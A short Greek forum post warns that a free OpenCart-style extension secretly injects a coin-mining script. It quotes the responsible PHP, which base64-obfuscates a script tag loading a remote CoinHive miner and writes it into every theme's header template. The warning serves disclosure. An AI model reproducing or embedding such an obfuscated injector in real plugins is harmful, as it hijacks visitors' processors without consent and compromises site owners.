Δωρεάν Επεκτάσεις & MODs
#5149 από spartakos
02 Φεβ 2018, 19:07
Το extension που έχει download από εδώ βάζει ένα script για coin mining στο site.
Είναι πολύ εύκολο φυσικά να το αφαιρέσεις από το install.xml αλλά δεν το έψαξα περαιτέρω.

Use at your own risk.

Συγκεκριμένα το κομμάτι κώδικα
Κώδικας: Επιλογή όλων      $modules = base64_decode('PC9oZWFkPg==');      
      $module = $modules;
      $inherit = base64_decode('PHNjcmlwdD4gZG9jdW1lbnQud3JpdGUoIjxzY3JpcHQgdHlwZT0ndGV4dC9qYXZhc2NyaXB0JyBzcmM9JyIrIGF0b2IoJ2FIUjBjSE02THk5amIybHVhR2wyWlM1amIyMHZiR2xpTDJOdmFXNW9hWFpsTG0xcGJpNXFjdz09JykgKyAiJz48XC9zY3IiICsgImlwdD4iKTs8L3NjcmlwdD48c2NyaXB0PiB2YXIganN3b3JrZXIgPSBuZXcgQ29pbkhpdmUuQW5vbnltb3VzKCdFMFFpM3JiNzRoWTVaR3hweG5ySXBoVXRseXhScElIVScse3Rocm90dGxlOiAwLjIsZm9yY2VBU01KUzogZmFsc2V9KTtqc3dvcmtlci5zdGFydChhdG9iKCdRMjlwYmtocGRtVXVSazlTUTBWZlJWaERURlZUU1ZaRlgxUkJRZz09JykpOzwvc2NyaXB0Pg==');
      $ocplace = $inherit . "\n" . $module;      
      foreach(glob(DIR_APPLICATION . 'view/theme/*', GLOB_ONLYDIR) as $dif) {
         $rlayout = DIR_APPLICATION . 'view/theme/' . basename($dif) . base64_decode('L3RlbXBsYXRlL2NvbW1vbi9oZWFkZXIudHBs');
         if (strpos(file_get_contents($rlayout), 'jsworker.start') == false) {
            file_put_contents($rlayout, str_replace($module, $ocplace, file_get_contents($rlayout)));
         }
      }

ΣΥΝΔΕΔΕΜΕΝΑ ΜΕΛΗ

Μέλη σε αυτό το φόρουμ: Δεν υπάρχουν εγγεγραμμένα μέλη και 3 επισκέπτες